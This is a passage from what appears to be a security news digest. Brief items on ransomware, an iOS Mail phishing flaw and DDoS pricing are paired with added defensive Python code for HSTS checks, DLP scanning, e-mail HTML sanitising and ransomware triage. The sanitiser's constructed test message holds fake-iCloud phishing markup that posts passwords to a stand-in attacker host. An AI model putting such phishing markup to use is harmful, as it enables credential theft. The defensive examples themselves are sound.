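WEAK_HTTP = Response("http://agency.example/", 200, {"Content-Type": "text/html"})
WEAK_HTTPS = Response("https://agency.example/", 200, {"Strict-Transport-Security": "max-age=300"})
GOOD_HTTP = Response("http://agency.example/", 301, {"Location": "https://agency.example/"})
GOOD_HTTPS = Response("https://agency.example/", 200,
                      {"strict-transport-security": "max-age=31536000; includeSubDomains; preload"})

if __name__ == "__main__":
    for label, pair in (("weak", (WEAK_HTTP, WEAK_HTTPS)), ("hardened", (GOOD_HTTP, GOOD_HTTPS))):
        print(label, check_https_posture(*pair) or ["ok"])
```

The redirect check matters as much as the header: a site that serves a full page over HTTP with HSTS only on the HTTPS side still leaves every first-time visitor exposed.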



+ Your finger is about to replace your bank password

We already use our fingerprint to unlock our phones, and one day soon your finger could replace your bank password. Over the past year, U.S. banks have been ramping up efforts to incorporate biometric technology (iris scanners, fingerprint readers and facial recognition) into their systems.



+ Facebook is finally embracing consumers’ desire to encrypt their emails.

The company announced today that people will now be able to share their public encryption keys via their Facebook profiles. They can also have the company encrypt the emails it sends them whenever they receive a notification on the social network. In a blog post, Facebook explains that it already encrypts notification emails as they’re ferried along the network.



+ New privacy app takes a page from NSA technology

A smartphone application called Scrambl3 from a California startup claims its “dark Internet tunnel” thwarts snooping on voice calls and messages. Scrambl3 was launched as a stand-alone app for Android devices by the startup, USMobile, which describes it as a way to create “trusted connections on untrusted networks.”



+ U.S. to bring Japan under its cyber defense umbrella

The United States will extend its cyber defense umbrella over Japan, helping its Asian ally cope with the growing threat of online attacks against military bases and infrastructure such as power grids, the two nations said in a joint statement



+ Lawmakers to automakers: How are you protecting cars from cyberattacks?

Ten members of the House Energy and Commerce Committee are questioning how the government and automakers are preparing for the potential cybersecurity risks of reliance on software in vehicles.



+ Most Security Depts Blindly Trust Certificates and Keys

Most IT security professionals acknowledge they don’t know how to detect or remediate quickly from compromised cryptographic keys and digital certificates…



+ Offended by Offensive Security

The commonly held belief in the realm of digital security (cyber security for the new folks and media) is the methods employed are strictly defensive in nature…



+ How Employee Negligence Can Put Your Company’s Data At Risk

Cyber Liability Insurance is a coverage that many businesses have overlooked in the hopes of keeping costs down in tough market conditions…



+ What is Cyber Insurance?

You may have heard the term “Cyber Insurance” in exceptionally glowing terms, describing it as the next big thing that no sensible business should be without. Or you may also have heard it described as something that is greatly hyped but which is not quite as awesome as all that.



+ 90% of DLP violations occur in cloud storage apps

Ninety percent of DLP violations occur in cloud storage apps, and a large percentage of these involve enterprise confidential intellectual property or customer or regulated data that the customer did not know about, or did not want, stored there…
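Both the SANS big-data finding earlier in this section (payment card and personal data landing in systems without the access controls of a relational store) and this DLP statistic come down to one operational question: can you recognise regulated data before it is uploaded? The content-inspection check below is an added example, not code from either report. The sample documents are constructed, and the detection rules (Luhn-validated 13 to 19 digit numbers, the U.S. SSN shape) are deliberately narrow assumptions that a real policy would extend.

```python
"""Content-inspection DLP check for card and identity data (added example; data constructed)."""
import re
from typing import Dict, List

# 13-19 digits, optionally separated by single spaces or hyphens, not embedded in a longer digit run.
CANDIDATE_PAN = re.compile(r"(?<![0-9])(?:[0-9][ -]?){13,19}(?![0-9])")
# U.S. SSN shape with the structurally invalid area/group/serial values excluded.
SSN = re.compile(r"(?<![0-9])(?!000|666|9)[0-9]{3}-(?!00)[0-9]{2}-(?!0000)[0-9]{4}(?![0-9])")


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test; weeds out most ticket/order numbers that merely look like a PAN."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(digits: str) -> str:
    """Keep BIN and last four so a report stays useful without re-leaking the card number."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def scan_text(text: str) -> Dict[str, List[str]]:
    """Return masked PAN and SSN hits found in one document's text."""
    findings: Dict[str, List[str]] = {"pan": [], "ssn": []}
    for match in CANDIDATE_PAN.finditer(text):
        digits = re.sub(r"[ -]", "", match.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            findings["pan"].append(mask_pan(digits))
    for match in SSN.finditer(text):
        findings["ssn"].append("***-**-" + match.group()[-4:])
    return findings


def allow_upload(name: str, text: str) -> bool:
    """Policy hook for a cloud-storage gateway: block any document carrying regulated data."""
    hits = scan_text(text)
    return not (hits["pan"] or hits["ssn"])


# Constructed sample documents: one genuine leak, one look-alike that must not false-positive.
DOCS: Dict[str, str] = {
    "customer_export.csv": "name,card,ssn\nA. Person,4111 1111 1111 1111,123-45-6789\n",
    "meeting_notes.txt": "Call 555-0100 about ticket 20150612; PO 4111111111111112 was a typo.",
}

if __name__ == "__main__":
    for name, body in DOCS.items():
        print(name, scan_text(body), "allowed" if allow_upload(name, body) else "BLOCKED")
```

The Luhn step is what keeps the rule usable: a bare "13 to 19 digits" pattern fires on shipping and order numbers constantly, and a DLP control that users learn to ignore protects nothing.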



+ The Rise Of Bring Your Own Encryption

The BYOE security model gives cloud customers complete control over the encryption of their data. At the same time, cloud providers are finding innovative ways to let users manage encryption keys…



+ BYOD advice

Five experts offer advice on managing risks when agency employees bring their own mobile devices to work



+ Cybersecurity Maturity Lacking or Non-Existent for Most



+ NIST outlines process for vetting mobile apps



+ “Top 10″ List for Security Law Compliance



+ 400 Awesome Free Things for Entrepreneurs and Startups




3  +++++++



+++ GREAT interactive database on SANS top 20 and way more!!!  GET THIS TOOL!!



+ 98% of tested web apps vulnerable to attack!

Of the many findings detailed in the newly released 2015 Trustwave Global Security Report (GSR), the news that 98% of tested web applications and 95% of tested mobile applications were found to be vulnerable to attack should alarm any organization.



+ Massive growth in new ransomware, malware targeting Adobe Flash

In the first quarter of 2015, McAfee Labs registered a 165 percent increase in new ransomware driven largely by the new, hard-to-detect CTB-Locker ransomware family, a new ransomware family called Teslacrypt, and the emergence of new versions of CryptoWall, TorrentLocker and BandarChor…

What to do if your computer is taken over by ransomware



+ Serious iOS bug makes it easy to steal users’ iCloud passwords

A security researcher has published attack code he said makes it easy to steal the iCloud passwords of people using the latest version of Apple iOS for iPhones and iPads. The proof-of-concept attack exploits a flaw in Mail, the default iOS e-mail program. Since the release of version 8.3 in early April, the app has failed to properly strip out potentially dangerous HTML code from incoming e-mail messages. The proof-of-concept exploit capitalizes on this failure by downloading a form from a remote server that looks identical to the legitimate iCloud log-in prompt. It can be displayed each time the booby-trapped message is viewed.
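The underlying defect is rendering untrusted HTML without removing what a phishing page needs: a form, its inputs and a way to pull or redirect to remote content. The robust fix is an allow-list sanitiser that rebuilds the message from permitted elements rather than trying to strip known-bad ones. The sanitiser below is an added example written against Python's standard library, not Apple's code, and the message it is run on is a constructed imitation of the pattern described above.

```python
"""Allow-list HTML sanitiser for untrusted e-mail bodies (added example; sample constructed)."""
from html import escape
from html.parser import HTMLParser
from typing import Dict, List, Optional, Set, Tuple

# Only these elements survive; anything else (meta refresh, base, link, input, img, ...) is dropped.
ALLOWED_TAGS: Set[str] = {"p", "br", "b", "i", "u", "em", "strong", "ul", "ol", "li",
                          "a", "div", "span", "blockquote"}
# These are dropped together with everything inside them: a credential form, scripts, frames.
DROP_WITH_CONTENT: Set[str] = {"script", "style", "form", "iframe", "object", "embed",
                               "textarea", "select", "button", "noscript"}
ALLOWED_ATTRS: Dict[str, Set[str]] = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class EmailSanitizer(HTMLParser):
    """Rebuilds the document from an allow-list instead of hunting for known-bad markup."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self._suppress = 0  # nesting depth inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        if tag in DROP_WITH_CONTENT:
            self._suppress += 1
            return
        if self._suppress or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # event handlers (onload=...), style, id, class: all dropped
            if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue  # javascript:, data:, vbscript: and scheme-relative links
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag: str) -> None:
        if tag in DROP_WITH_CONTENT:
            self._suppress = max(0, self._suppress - 1)
            return
        if self._suppress or tag not in ALLOWED_TAGS or tag == "br":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data: str) -> None:
        if not self._suppress:
            self.out.append(escape(data))  # re-escape so text can never become markup

    def handle_comment(self, data: str) -> None:
        pass  # comments (including IE conditional comments) never reach the renderer


def sanitize_email_html(html: str) -> str:
    parser = EmailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed message modelled on the phishing pattern described above: a fake iCloud prompt.
PHISH_HTML = (
    "<p>Your iCloud session has expired.</p>"
    '<meta http-equiv="refresh" content="0;url=http://attacker.invalid/login">'
    '<form action="http://attacker.invalid/steal" method="post">'
    'Apple ID <input name="user"> Password <input type="password" name="pass">'
    "<button>Sign in</button></form>"
    '<a href="javascript:alert(1)">Click</a> <a href="https://support.example/">Help</a>'
)

if __name__ == "__main__":
    print(sanitize_email_html(PHISH_HTML))
```

Run on the sample, only the paragraph and the two links survive, the first of them stripped of its `javascript:` target; the form, its inputs and the meta refresh are gone. The point of the allow-list is that the next bypass (a tag or attribute nobody thought to blocklist) fails closed.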



+ 75% of Companies Worldwide Face Significant Risk Exposure, RSA Survey Finds

Overall survey results found that nearly 75 percent of respondents face significant cybersecurity risk exposure and had their overall capabilities ranked below the “developed” category. Of the more than 400 companies surveyed, only five percent were ranked as having advanced capabilities. The report also found that the size of an organization is not an adequate indicator of its security maturity.



+ Hackers can send fatal dose to hospital drug pumps

When security researcher Billy Rios reported earlier this year that he’d found vulnerabilities in a popular drug infusion pump that would allow a hacker to raise the dosage limit on medication delivered to patients, there was little cause for concern. Now Rios says he’s found more serious vulnerabilities in several models of pumps made by the same manufacturer, which would allow a hacker to surreptitiously and remotely change the amount of drugs administered to a patient.



+ Hunting for hackers, N.S.A. secretly expands Internet spying at U.S. border

Without public notice or debate, the Obama administration has expanded the National Security Agency’s warrantless surveillance of Americans’ international Internet traffic to search for evidence of malicious computer hacking,



+ Cloud providers hit hard by DDoS attacks in Q1: VeriSign

According to research from VeriSign, in the first quarter of 2015 its customers in the IT services and cloud sector experienced the largest volume of DDoS attacks, accounting for more than a third of all attacks the company observed and peaking in size at just over 54 Gbps.



+ Cyber weapons: 4 defining characteristics

Nations can take advantage of anonymity and deniability while conducting military campaigns in cyberspace, enabling a type of “clean coercion” warfare. But, what is the definition of a weapon, and how can we more clearly identify when a cyberattack should be correctly labeled as a “cyber weapon”?



+ Hola VPN used to perform DDoS attacks, violate user privacy

Hola is a VPN provider that purports to offer its users freedom from censorship, a way to access geoblocked content, and anonymous browsing. The service claims that more than 47 million people are part of its peer-to-peer network. But it is dangerously insecure: the client software has flaws that allow remote code execution, and features of the client enable tracking. On top of that, critically, Hola sells access to its peer-to-peer network with little oversight, enabling it to be used maliciously.



+ Russian crypto-malware encrypts files completely

Ransomware with file encryption routines is one of the nastiest cyber threats today, not just for the average user but also for businesses and even law enforcement departments, which have no alternative but to pay for data recovery unless a backup system has been set up. The Trojan, also known as Encoder.858 and Shade, applies full encryption to the files it processes, from content to name and extension.
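When a Trojan like this one replaces content, name and extension alike, the trace it leaves on disk is files that no longer look like any format: near-maximal byte entropy and no recognisable header, under names nothing else on the system would produce. The triage routine below is an added example, not code from the report. The `.locked` and `.enc` names, the 7.5 bits-per-byte threshold, the alert ratio and the sample files are all constructed; the sample "ciphertext" is a SHA-256 counter stream standing in for real cipher output so the example runs deterministically offline.

```python
"""Entropy-based triage for ransomware-encrypted files (added example; samples constructed)."""
import hashlib
import math
import os
from collections import Counter
from typing import Dict, List, Tuple

HIGH_ENTROPY = 7.5       # bits/byte; assumed threshold, encrypted data sits near 8.0
SAMPLE_BYTES = 4096      # only the head of each file is inspected
ALERT_RATIO = 0.5        # assumed: this share of suspect files in one tree triggers the alert
# Formats that are legitimately high-entropy (compressed) and identified by their header.
COMPRESSED_MAGIC = (b"PK\x03\x04", b"\xff\xd8\xff", b"\x89PNG", b"%PDF")
KNOWN_EXT = {".txt", ".csv", ".docx", ".xlsx", ".pptx", ".pdf", ".jpg", ".png"}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of the empirical byte distribution (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(name: str, data: bytes) -> Tuple[bool, str]:
    """(suspect?, reason) for one file, judged from its name and leading bytes."""
    head = data[:SAMPLE_BYTES]
    ext = os.path.splitext(name)[1].lower()
    if head.startswith(COMPRESSED_MAGIC):
        return False, "known compressed format"
    ent = shannon_entropy(head)
    if ent < HIGH_ENTROPY:
        return False, f"entropy {ent:.2f} looks like plaintext"
    if ext not in KNOWN_EXT:
        return True, f"entropy {ent:.2f} and unexpected extension {ext or '(none)'}"
    return True, f"entropy {ent:.2f} with {ext} but no matching format header"


def triage(files: Dict[str, bytes]) -> Tuple[bool, List[Tuple[str, str]]]:
    """(alert?, suspects) for a directory snapshot given as {name: bytes}."""
    suspects: List[Tuple[str, str]] = []
    for name, data in files.items():
        hit, why = classify(name, data)
        if hit:
            suspects.append((name, why))
    alert = bool(files) and len(suspects) / len(files) >= ALERT_RATIO
    return alert, suspects


def fake_ciphertext(seed: bytes, length: int) -> bytes:
    """Deterministic SHA-256 counter stream standing in for cipher output (constructed test data)."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(seed + block.to_bytes(4, "big")).digest()
        block += 1
    return bytes(out[:length])


# Constructed directory snapshot: two untouched files, two renamed-and-encrypted ones.
SAMPLE_FILES: Dict[str, bytes] = {
    "quarterly_report.docx": b"PK\x03\x04" + fake_ciphertext(b"zip", 4092),  # docx is a zip: high entropy, expected
    "readme.txt": b"Meeting notes: move the backup job to the new NAS by Friday.\n" * 60,
    "a1f9c0d2.locked": fake_ciphertext(b"victim1", 4096),   # content, name and extension replaced
    "budget.xlsx.enc": fake_ciphertext(b"victim2", 4096),
}

if __name__ == "__main__":
    alert, hits = triage(SAMPLE_FILES)
    print("ALERT" if alert else "clean", hits)
```

The format-header exemption is what keeps the false-positive rate tolerable: Office documents, images and PDFs are compressed and score almost as high as ciphertext, so entropy alone would flag half of a normal file share. This is a detection aid for the response team, not a substitute for the offline backup the paragraph above calls for.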



+ FBI calls for new wiretap law covering social media

Encrypted social networking tools are hindering the FBI’s ability to track terrorists and recruiters who are appealing to young people in the U.S., an FBI official told lawmakers. Congress must pass a new wiretap law that requires social media websites and operators of other Internet communication tools to share customers’ communications with law enforcement agencies the same way that telecom carriers do, the official said.



+ British spies betrayed to Russians and Chinese

Russia and China have cracked the top-secret cache of files stolen by the fugitive US whistleblower Edward Snowden, forcing MI6 to pull agents out of live operations in hostile countries, according to senior officials in Downing Street, the Home Office and the security services…



+ Even with a VPN, open Wi-Fi exposes users

Those moments between Wi-Fi connect and VPN launch can give away a lot…I tested this scenario at a Starbucks with Google Wi-Fi while running Wireshark. Thousands of packets went back and forth on the open network before the VPN attempted to connect. A quick scan of the list found nothing that looked dangerous, and in fact the software on my system used TLS 1.2 in almost all cases, which was quite a relief



+ Price of website-disabling DDoS attacks falls to US$38 per hour as botnets proliferate in China, Vietnam (South China Morning Post)

It is becoming easier than ever to launch a potentially ruinously expensive, server-disabling assault against any website as criminal organizations offer distributed denial-of-service (DDoS) attacks at cut-price rates…



+ Firewalls Sustain Foundation of Sound Security

Simply put, organizations that cannot maintain rigid firewall enforcement are more likely to be compromised…

Why the Firewall is Increasingly Irrelevant

It will take a dramatic reimagining of security to dedicate focus to the areas where company data actually resides. It starts with tearing down the firewall.



+ Conventional Wisdom About Cyber Hacks is Flawed

A recent article out of SolPass reports, “Business and government leaders who are being told that there’s no preventive strategy to stop cyberattacks and fraud are being subjected to fundamentally flawed thinking,

DO the cyber basics well folks – it works!!!



+Cybercrime Can Give Attackers 1,425% Return on Investment

Going rates on the black market show ransomware and carding attack campaign managers have plenty to gain.



+ 11 Countries with Most Hackers and Cyber Criminals

US first (the count includes compromised computers), then China, then Germany.



+Long Cons: The Next Age of Cyber Attacks

When hackers know that a big payday is coming they don’t mind waiting for months for the best moment to strike.

